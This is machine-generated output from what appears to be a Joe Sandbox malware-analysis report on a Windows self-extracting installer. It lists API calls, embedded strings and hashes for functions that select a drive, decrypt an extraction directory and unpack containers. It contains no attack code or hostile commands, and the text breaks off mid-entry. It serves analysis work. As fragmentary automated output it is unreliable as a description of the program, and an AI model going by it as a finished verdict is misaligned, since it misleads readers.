___BuildCatchObjectHelper 16747->16750 16751 219a43 GetProcessHeap HeapSize 16747->16751 16750->16746 16752 2189d6 16750->16752 16751->16750 16753 2189f1 16752->16753 16755 2189f7 16752->16755 16758 219a43 GetProcessHeap HeapSize 16753->16758 16756 2187eb 4 API calls 16755->16756 16757 2189fe _memmove ___BuildCatchObjectHelper 16755->16757 16756->16757 16757->16746 16758->16755 16760 219926 10 API calls 16759->16760 16761 219a86 16760->16761 16762 219a90 GetFileVersionInfoSizeW 16761->16762 16767 219ab0 16761->16767 16764 219aa4 GetLastError 16762->16764 16765 219ace GlobalAlloc 16762->16765 16763 218645 GetComputerNameW 16763->16729 16764->16767 16765->16767 16768 219ae4 GetFileVersionInfoW 16765->16768 16766 218e6f 3 API calls 16766->16763 16767->16763 16767->16766 16769 219b10 GetLastError 16768->16769 16770 219af6 VerQueryValueW 16768->16770 16772 219b1c GlobalFree 16769->16772 16770->16769 16770->16772 16772->16767 16774 219ca3 11 API calls 16773->16774 16775 219d1f 16774->16775 16776 219d29 GetLastError 16775->16776 16777 219d4c GetProcessHeap HeapAlloc 16775->16777 16778 2160c2 16776->16778 16779 219d63 16777->16779 16778->16473 16778->16474 16782 218889 7 API calls 16779->16782 16787 219d91 16779->16787 16780 219da2 16783 21a414 8 API calls 16780->16783 16781 219da9 16781->16778 16784 219daf CloseHandle 16781->16784 16785 219d86 16782->16785 16783->16781 16784->16778 16785->16787 16788 21a505 16785->16788 16787->16780 16787->16781 16804 219b6a SetFilePointerEx 16788->16804 16790 21a566 16790->16787 16791 21a572 GetProcessHeap RtlReAllocateHeap 16794 21a603 16791->16794 16795 21a52c 16791->16795 16792 21a54f GetProcessHeap RtlAllocateHeap 16792->16790 16793 21a58e ReadFile 16792->16793 16793->16795 16796 21a60c GetLastError 16793->16796 16794->16790 16797 21a65e GetProcessHeap HeapFree 16794->16797 16795->16790 16795->16791 16795->16792 16795->16793 16799 21a5da 16795->16799 16796->16794 16797->16790 16798 21a670 16797->16798 16807 219a29 GetLastError 
16798->16807 16799->16794 16801 21a5de GetProcessHeap HeapAlloc 16799->16801 16801->16794 16802 21a5ef GetProcessHeap HeapAlloc 16801->16802 16802->16794 16803 21a635 _memmove 16802->16803 16803->16794 16805 219b96 16804->16805 16806 219b8c GetLastError 16804->16806 16805->16795 16806->16805 16808 219a33 16807->16808 16808->16790 16810 219de2 16809->16810 16811 219dec 16809->16811 16810->16477 16853 21a3dc GetProcessHeap HeapAlloc 16811->16853 16814 219e02 GetProcessHeap HeapAlloc 16815 219e21 16814->16815 16816 219e2b 16814->16816 16815->16810 16817 21a46e 12 API calls 16815->16817 16818 219e57 16816->16818 16820 218889 7 API calls 16816->16820 16817->16810 16818->16815 16819 219e7e GetCurrentProcess GetCurrentProcess DuplicateHandle 16818->16819 16821 219e6c 16818->16821 16822 219ea7 16819->16822 16823 219e9b GetLastError 16819->16823 16820->16818 16873 21a7b1 16821->16873 16822->16815 16825 218889 7 API calls 16822->16825 16823->16822 16827 219ec4 16825->16827 16827->16815 16855 21ab0c 16827->16855 16830 219f1a 16829->16830 16831 219f47 GetProcessHeap HeapAlloc 16830->16831 16832 219f64 16830->16832 16831->16832 16832->16481 16834 21a475 FindCloseChangeNotification 16833->16834 16835 21a47c 16833->16835 16834->16835 16836 21a491 GetProcessHeap HeapFree 16835->16836 16837 21a4a2 16835->16837 16836->16837 16838 21a49d 16836->16838 16839 21a4a9 GetProcessHeap HeapFree 16837->16839 16840 21a4ba 16837->16840 16841 219a29 GetLastError 16838->16841 16839->16840 16842 21a4b5 16839->16842 16843 21a4c1 GetProcessHeap HeapFree 16840->16843 16844 21a4d2 16840->16844 16841->16837 16845 219a29 GetLastError 16842->16845 16843->16844 16846 21a4cd 16843->16846 16847 21a4df 16844->16847 16850 218e6f 3 API calls 16844->16850 16845->16840 16849 219a29 GetLastError 16846->16849 16848 21a4ec GetProcessHeap HeapFree 16847->16848 16851 218e6f 3 API calls 16847->16851 16852 21a4fa 16848->16852 16849->16844 16850->16847 16851->16848 16852->16481 16854 219df5 16853->16854 16854->16814 

                                                              Control-flow Graph (first node: 127, 21774a-217782; legend: Executed / Not Executed)
                                                              APIs
                                                                • Part of subcall function 002187EB: GetProcessHeap.KERNEL32(00000000,?,00000040,00000040,0021917A,00000000,0023BF10,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 00218802
                                                                • Part of subcall function 002187EB: HeapReAlloc.KERNEL32(00000000,?,00000040,00000040,0021917A,00000000,0023BF10,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 00218809
                                                              • GetLogicalDriveStringsW.KERNELBASE(0000009C,?,00000000,00000000,0023BEF0,?,?,00216F09,?,?,00000000,?,?,00215B53,?,?), ref: 002177E5
                                                              • GetLastError.KERNEL32(?,?,00216F09,?,?,00000000,?,?,00215B53,?,?,?,?,?,0023BEF0), ref: 002177EE
                                                              Strings
                                                              • Failed to allocate memory for logical drives, xrefs: 002177CC
                                                              • Drive '%S' has been selected as the largest fixed drive, xrefs: 00217982
                                                              • Unable to allocate a string for extracion drive, xrefs: 002179A4
                                                              • Unable to allocate the cluster drive map, xrefs: 00217795
                                                              • Considering drive: '%S'..., xrefs: 00217849
                                                              • Unable to get the drive type, xrefs: 0021795F
                                                              • Drive '%S' is rejected because it can't be written to, xrefs: 002178C7
                                                              • Drive '%S' is rejected because it's not a hard disk or RAM disk, xrefs: 002178AB
                                                              • Drive '%S' is rejected because of the unknown or unsuitable drive type, xrefs: 00217898
                                                              • Cluster drive map: '%S', xrefs: 002177AA
                                                              • Failed to get logical drives, xrefs: 0021780F
                                                              • Failed to find any drive to extract to, xrefs: 00217958
                                                              • Drive '%S' is rejected because it's a resource of a cluster, xrefs: 0021786B
                                                              • Drive '%S' has been selected as the largest removable drive, xrefs: 002179BA
                                                              • Failed to dtermine whether a drive can be written to, xrefs: 00217966
                                                              • S[!, xrefs: 00217916
                                                              • Insufficient size on any available drives, xrefs: 002179CE
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocDriveErrorLastLogicalProcessStrings
                                                              • String ID: Cluster drive map: '%S'$Considering drive: '%S'...$Drive '%S' has been selected as the largest fixed drive$Drive '%S' has been selected as the largest removable drive$Drive '%S' is rejected because it can't be written to$Drive '%S' is rejected because it's a resource of a cluster$Drive '%S' is rejected because it's not a hard disk or RAM disk$Drive '%S' is rejected because of the unknown or unsuitable drive type$Failed to allocate memory for logical drives$Failed to dtermine whether a drive can be written to$Failed to find any drive to extract to$Failed to get logical drives$Insufficient size on any available drives$S[!$Unable to allocate a string for extracion drive$Unable to allocate the cluster drive map$Unable to get the drive type
                                                              • API String ID: 3325457267-389475889
                                                              • Opcode ID: cad1440d558cf80f80f4ed05c42be78555383fa58816c622f576e287de919267
                                                              • Instruction ID: 2ec0ec9337f118013b792d5ea11828e7abdff73cf9d629c058e4c8c7ea2894b5
                                                              • Opcode Fuzzy Hash: cad1440d558cf80f80f4ed05c42be78555383fa58816c622f576e287de919267
                                                              • Instruction Fuzzy Hash: FC81D831D3821AABDF11AF94DC81AEEB7F5AFB4310F210026E505B7140DB719AE5CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph (first node: 223, 2159a6-2159fc; legend: Executed / Not Executed)
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 002159E3
                                                                • Part of subcall function 00216C5C: GetCommandLineW.KERNEL32(?,00000000,0023BEF0), ref: 00216C76
                                                                • Part of subcall function 00216C5C: CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00216C84
                                                                • Part of subcall function 00216C5C: GetLastError.KERNEL32 ref: 00216C91
                                                              • _wcsrchr.LIBCMT ref: 00215A1C
                                                              • _memset.LIBCMT ref: 00215A37
                                                              • PathRemoveExtensionW.SHLWAPI(?), ref: 00215A58
                                                              • _memset.LIBCMT ref: 00215A72
                                                              • GetEnvironmentVariableW.KERNEL32(temp,?,00000104), ref: 00215A88
                                                              • swprintf.LIBCMT ref: 00215AA3
                                                                • Part of subcall function 00216463: GetProcessHeap.KERNEL32(00000000,00000000,74DF23A0,?,00215BF4), ref: 002164A0
                                                                • Part of subcall function 00216463: HeapFree.KERNEL32(00000000,?,00215BF4), ref: 002164A7
                                                              • CloseHandle.KERNEL32(000001D0), ref: 00215C5E
                                                                • Part of subcall function 00218E6F: GetProcessHeap.KERNEL32(00000000,?,?,002185A8,00000000,00000000,?,?,00216A49,00000000,Failed while running the progress dialog.), ref: 00218E79
                                                                • Part of subcall function 00218E6F: HeapFree.KERNEL32(00000000,?,002185A8,00000000,00000000,?,?,00216A49,00000000,Failed while running the progress dialog.), ref: 00218E80
                                                              Strings
                                                              • Failed to execute file, xrefs: 00215BBA
                                                              • Failed to extract, xrefs: 00215B89
                                                              • Failed to select and/or prepare the directory for extraction, xrefs: 00215B59
                                                              • Unable to estimate the required size, xrefs: 00215B1F
                                                              • Failed to allocate log, xrefs: 00215AC5
                                                              • Failed to initialize arguments, xrefs: 002159FE
                                                              • === Logging stopped: %S ===, xrefs: 00215C2D
                                                              • \dd_%s_decompression_log.txt, xrefs: 00215A95
                                                              • Exiting with result code: 0x%x, xrefs: 00215C08
                                                              • temp, xrefs: 00215A83
                                                              • Failed to open the box, xrefs: 00215AFC
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$CommandFreeHandleLineProcess_memset$ArgvCloseEnvironmentErrorExtensionLastModulePathRemoveVariable_wcsrchrswprintf
                                                              • String ID: === Logging stopped: %S ===$Exiting with result code: 0x%x$Failed to allocate log$Failed to execute file$Failed to extract$Failed to initialize arguments$Failed to open the box$Failed to select and/or prepare the directory for extraction$Unable to estimate the required size$\dd_%s_decompression_log.txt$temp
                                                              • API String ID: 4209647820-1996636437
                                                              • Opcode ID: 19df6012a6049c3618081398d619fa646852ed0732f59e0498384ff22dc638d4
                                                              • Instruction ID: 5e417afe74eb10f77e2f3b9c7f83389b532249c1d8057c6293c7109c2ae48f0c
                                                              • Opcode Fuzzy Hash: 19df6012a6049c3618081398d619fa646852ed0732f59e0498384ff22dc638d4
                                                              • Instruction Fuzzy Hash: 2E813571538B62EBC311EF64EC49AEF73E9ABE4700F11052AF64493152DB70D9E48B92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph (first node: 399, 21621f-21624f; legend: Executed / Not Executed)
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000008,?,00000000,74DF23A0,00000000,?,?,?,?,?,?,?,00215B83,0023BEF0), ref: 0021623D
                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,00215B83,0023BEF0), ref: 00216244
                                                              • GetProcessHeap.KERNEL32(00000000,00000002,?,?,?,?,?,?,?,00215B83,0023BEF0), ref: 0021631A
                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,00215B83,0023BEF0), ref: 00216321
                                                              • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000002,?,?,?,?,?,?,?,00215B83,0023BEF0), ref: 00216426
                                                              • HeapFree.KERNEL32(00000000,?,00000000,00000002,?,?,?,?,?,?,?,00215B83,0023BEF0), ref: 0021642D
                                                              Strings
                                                              • Extracting files to: %S, xrefs: 0021636D
                                                              • Failed to verify box container #%d., xrefs: 00216446
                                                              • Failed to alloc cleanup list buffer, xrefs: 00216335
                                                              • Failed to extract all files out of box container #%d., xrefs: 0021644E
                                                              • User canceled extraction..., xrefs: 002163E8
                                                              • Failed to allocate memory to hold container handles., xrefs: 00216256
                                                              • Failed to open container., xrefs: 0021633F
                                                              • Failed to read container header., xrefs: 00216349
                                                              • Failed to start reporting progress, xrefs: 00216360
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Alloc$Free
                                                              • String ID: Extracting files to: %S$Failed to alloc cleanup list buffer$Failed to allocate memory to hold container handles.$Failed to extract all files out of box container #%d.$Failed to open container.$Failed to read container header.$Failed to start reporting progress$Failed to verify box container #%d.$User canceled extraction...
                                                              • API String ID: 1864747095-3704756192
                                                              • Opcode ID: 2439fb59f22fb2decf2b8887fe73cebce2b5074553125a145e647f672fea3027
                                                              • Instruction ID: 5329a3b1cbfe855740d72d71d40327af1b9da558f97f0d7c2efd1afa86e9149f
                                                              • Opcode Fuzzy Hash: 2439fb59f22fb2decf2b8887fe73cebce2b5074553125a145e647f672fea3027
                                                              • Instruction Fuzzy Hash: F661D632D20226ABDB219F98D889AEE77F1EF30B10F154165E911A7241DB70DDF0CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 002335E6: _malloc.LIBCMT ref: 00233600
                                                              • DeleteCriticalSection.KERNEL32(?,?), ref: 0022003F
                                                              • DeleteCriticalSection.KERNEL32(?,?,?), ref: 00220592
                                                                • Part of subcall function 00222B6C: __EH_prolog3.LIBCMT ref: 00222B73
                                                              • DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?), ref: 00220433
                                                              • DeleteCriticalSection.KERNEL32(?,?), ref: 0022070F
                                                              • DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?), ref: 002208F7
                                                              • DeleteCriticalSection.KERNEL32(?,?), ref: 00220AE6
                                                                • Part of subcall function 00228513: __EH_prolog3.LIBCMT ref: 0022851D
                                                              • __CxxThrowException@8.LIBCMT ref: 00220B37
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: CriticalDeleteSection$H_prolog3$Exception@8Throw_malloc
                                                              • String ID: ($)$kQ"$lU!
                                                              • API String ID: 3630289165-1381640395
                                                              • Opcode ID: 8b98599d87f2f6565f0b05a231cb1cd0557cd899c54a9d76dfdf9287ee75d44c
                                                              • Instruction ID: 8f718f4b81b1c8e8dedda2da53b73166a262da5b4ebfcc2c4e3f93fd58353609
                                                              • Opcode Fuzzy Hash: 8b98599d87f2f6565f0b05a231cb1cd0557cd899c54a9d76dfdf9287ee75d44c
                                                              • Instruction Fuzzy Hash: F3B25671518386DFD330DFA8D488B9ABBE4BF98304F04496EE58D87252CB71A859CF52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph (first node: 850, 217c12-217c1e; legend: Executed / Not Executed)
                                                              APIs
                                                              • LoadLibraryW.KERNEL32(advapi32.dll,?,00216F3D,00F10128,00F10128,00000000,?,?,00000000,?,?,00215B53,?,?,?,?), ref: 00217C25
                                                              • GetLastError.KERNEL32(?,00216F3D,00F10128,00F10128,00000000,?,?,00000000,?,?,00215B53,?,?,?,?,?), ref: 00217C2F
                                                              • GetProcAddress.KERNEL32(00000000,DecryptFileW), ref: 00217C59
                                                              • GetLastError.KERNEL32(?,00216F3D,00F10128,00F10128,00000000,?,?,00000000,?,?,00215B53,?,?,?,?,?), ref: 00217C68
                                                              • DecryptFileW.ADVAPI32(?,00000000), ref: 00217C91
                                                              • GetLastError.KERNEL32(?,00216F3D,00F10128,00F10128,00000000,?,?,00000000,?,?,00215B53,?,?,?,?,?), ref: 00217C9B
                                                              Strings
                                                              • advapi32.dll, xrefs: 00217C20
                                                              • Failed to decrypt the extract directory, xrefs: 00217CB8
                                                              • Failed to load DecryptFileW from advapi.dll, xrefs: 00217C85
                                                              • DecryptFileW, xrefs: 00217C53
                                                              • Failed to load advapi32.dll, xrefs: 00217C4C
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$AddressDecryptFileLibraryLoadProc
                                                              • String ID: DecryptFileW$Failed to decrypt the extract directory$Failed to load DecryptFileW from advapi.dll$Failed to load advapi32.dll$advapi32.dll
                                                              • API String ID: 156776402-3428403797
                                                              • Opcode ID: c99c103e1bd720990142f0aef253f335d70b0b0a434083a49daa8547ce006df9
                                                              • Instruction ID: 9798b4a03cc2573a78a05655e6bdda8361d522870e4be3000f0d7129f79c6374
                                                              • Opcode Fuzzy Hash: c99c103e1bd720990142f0aef253f335d70b0b0a434083a49daa8547ce006df9
                                                              • Instruction Fuzzy Hash: 24111E72BA82439AF3201F61BD0D7E26AE85BB1785F21403ABA0DD51A1EB78C4F15694
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_
                                                              • String ID: "$kQ"$lU!
                                                              • API String ID: 2427045233-661184108
                                                              • Opcode ID: b4929a64b29ef6bad3bb431bc30deb436b16a4608b2d23b88cf483791a2a2580
                                                              • Instruction ID: 28b3d0d29e6f9db901a70ebe78c73559ed2408eb03c7440ee9a59f3466a63fb2
                                                              • Opcode Fuzzy Hash: b4929a64b29ef6bad3bb431bc30deb436b16a4608b2d23b88cf483791a2a2580
                                                              • Instruction Fuzzy Hash: B2727930518392EFD721DFA4D484B9ABBE4BF99308F044A5DE4C98B252C774E865CF62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              [Control-flow graph not reproduced; its nodes reference CryptAcquireContextA, CryptGenRandom, CryptReleaseContext and GetLastError]
                                                              APIs
                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,0023BEF0,?,?,?,?,?,0023BEF0), ref: 00217558
                                                              • GetLastError.KERNEL32 ref: 00217562
                                                              • CryptGenRandom.ADVAPI32(?,00000010,?), ref: 00217596
                                                              • GetLastError.KERNEL32 ref: 002175A0
                                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00217662
                                                              Strings
                                                              • Failed to concatenate the formatted byte to the random string, xrefs: 0021764A
                                                              • Failed to generate a random value, xrefs: 002175C1
                                                              • %02x, xrefs: 002175F4
                                                              • Failed to allocate formatted current byte for the random string, xrefs: 00217643
                                                              • Failed to acquire Crypto context, xrefs: 00217583
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Crypt$ContextErrorLast$AcquireRandomRelease
                                                              • String ID: %02x$Failed to acquire Crypto context$Failed to allocate formatted current byte for the random string$Failed to concatenate the formatted byte to the random string$Failed to generate a random value
                                                              • API String ID: 236824231-4110481378
                                                              • Opcode ID: 863f8cefd06f57a0c2e5302d8f40c880508b743f567f44aa4084a70ad0e6504d
                                                              • Instruction ID: 1df99f8d5fa1a80710aedfd0d824c4abefddd41dcdd287f082cc3a1efc760184
                                                              • Opcode Fuzzy Hash: 863f8cefd06f57a0c2e5302d8f40c880508b743f567f44aa4084a70ad0e6504d
                                                              • Instruction Fuzzy Hash: 1B41F872D2815AABDB109FA8DC497EEBBF9AF74300F150036ED01B3181D67849A08B95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetDriveTypeW.KERNELBASE(00217887,00000000,?), ref: 00217A32
                                                              • SetErrorMode.KERNELBASE(00000000), ref: 00217A50
                                                              • SetErrorMode.KERNELBASE(00000000), ref: 00217A59
                                                              • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00217A8B
                                                              • DeviceIoControl.KERNEL32(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 00217AB0
                                                              • CloseHandle.KERNEL32(?), ref: 00217AC5
                                                              • SetErrorMode.KERNELBASE(?), ref: 00217ACE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$CloseControlCreateDeviceDriveFileHandleType
                                                              • String ID: \\.\?:
                                                              • API String ID: 1714706890-2364848050
                                                              • Opcode ID: 11b8dba31f8058aa800f40b0423193e71133974800c242d87bb1f973fe816949
                                                              • Instruction ID: 5c76c89f7e4af05117e50dc4076fcb1c687160f9d32d076e373bcfde31d20637
                                                              • Opcode Fuzzy Hash: 11b8dba31f8058aa800f40b0423193e71133974800c242d87bb1f973fe816949
                                                              • Instruction Fuzzy Hash: BF218D71D14219BBCB11DFA5EC48ADEBBF9EF99320F004415F905E7150DB709690CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetLocalTime.KERNEL32(?,?,00000000), ref: 002184E2
                                                              • swprintf.LIBCMT ref: 00218513
                                                                • Part of subcall function 0021870C: lstrlenA.KERNEL32(00000000,00000004,?,?,10/4/2023, 15:57:52,?,?,?,?,002184C0,?,?,00000000,?,00218526,?), ref: 00218738
                                                                • Part of subcall function 0021870C: WriteFile.KERNELBASE(00000000,00000004,00000004,00000000,?,?,?,002184C0,?,?,00000000,?,00218526,?,[%s] ,10/4/2023, 15:57:52), ref: 00218762
                                                                • Part of subcall function 0021870C: WriteFile.KERNELBASE(00214DA4,00000002,00000004,00000000,?,?,?,002184C0,?,?,00000000,?,00218526,?,[%s] ,10/4/2023, 15:57:52), ref: 00218787
                                                                • Part of subcall function 0021870C: GetLastError.KERNEL32(?,?,?,002184C0,?,?,00000000,?,00218526,?,[%s] ,10/4/2023, 15:57:52,10/4/2023, 15:57:52,00000032,%u/%u/%u, %u:%u:%u,?), ref: 0021878D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$ErrorLastLocalTimelstrlenswprintf
                                                              • String ID: %u/%u/%u, %u:%u:%u$10/4/2023, 15:57:52$[%s]
                                                              • API String ID: 4160318958-4194652310
                                                              • Opcode ID: 574c4c56983596da465b832fcf38acbb20604392303a264a44b1475bf464c073
                                                              • Instruction ID: 1eac01ce5e9ac2e06d09ae5d028f20f28c43738a205aba36e49d3f639bdc1fcc
                                                              • Opcode Fuzzy Hash: 574c4c56983596da465b832fcf38acbb20604392303a264a44b1475bf464c073
                                                              • Instruction Fuzzy Hash: 2C012C75910118BACB10EF969C45EFFB7FCAF49B14F100066F948E2180DA789EA1E775
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetTimeZoneInformation.KERNELBASE(?), ref: 00218EB8
                                                              • GetSystemTime.KERNEL32(?), ref: 00218EC2
                                                              • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?), ref: 00218ED7
                                                              Strings
                                                              • %04d/%02d/%02d %02d:%02d:%02d, xrefs: 00218EFB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Time$System$InformationLocalSpecificZone
                                                              • String ID: %04d/%02d/%02d %02d:%02d:%02d
                                                              • API String ID: 1716759327-2911751566
                                                              • Opcode ID: e912fb42d6c359aa032c0f39cfb34c611e5034df605671a03715bc80d2f325c0
                                                              • Instruction ID: 3386da231afdcfa26eedb8ce8d45b52b315a64af6cd34e3599bd6941dc4a701b
                                                              • Opcode Fuzzy Hash: e912fb42d6c359aa032c0f39cfb34c611e5034df605671a03715bc80d2f325c0
                                                              • Instruction Fuzzy Hash: C501D6A280011DBACB10DBD5D949AFFB7FCAF0C605F104056FA49E2040EA38AA94DB71
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3_catch.LIBCMT ref: 00222060
                                                              • __CxxThrowException@8.LIBCMT ref: 00222229
                                                                • Part of subcall function 00233B07: RaiseException.KERNEL32(00233665,?,e6#,?,?,?,?,?,00233665,?,00237124,0023BE98), ref: 00233B49
                                                                • Part of subcall function 002335E6: _malloc.LIBCMT ref: 00233600
                                                                • Part of subcall function 002335E6: std::exception::exception.LIBCMT ref: 00233635
                                                                • Part of subcall function 002335E6: std::exception::exception.LIBCMT ref: 0023364F
                                                                • Part of subcall function 002335E6: __CxxThrowException@8.LIBCMT ref: 00233660
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throwstd::exception::exception$ExceptionH_prolog3_catchRaise_malloc
                                                              • String ID:
                                                              • API String ID: 1092593795-0
                                                              • Opcode ID: 41ec4ed5a8e7d4de42864dd20fe9819641c602b06b7b82448c64306cea2c2ccf
